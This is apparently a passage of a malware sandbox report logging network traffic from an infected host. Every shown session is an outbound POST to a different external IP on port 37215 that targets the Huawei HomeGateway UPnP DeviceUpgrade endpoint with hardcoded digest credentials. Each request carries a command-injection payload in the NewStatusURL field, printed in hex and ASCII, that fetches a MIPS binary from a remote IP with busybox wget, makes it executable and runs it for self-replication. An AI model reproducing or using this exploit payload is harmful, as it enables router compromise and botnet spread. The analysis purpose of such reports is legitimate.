                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1991192.168.2.133388841.3.94.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686367989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1992192.168.2.1344906157.10.232.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686388016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1993192.168.2.1336736197.215.114.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686733961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1994192.168.2.1340310157.83.251.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686747074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1995192.168.2.134734213.123.90.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686774969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1996192.168.2.1357708197.71.116.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686774969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1997192.168.2.1344556157.182.176.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686786890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1998192.168.2.1338276197.244.34.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686834097 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1999192.168.2.1359696157.74.253.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686841965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2000192.168.2.1337654197.46.72.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686841965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
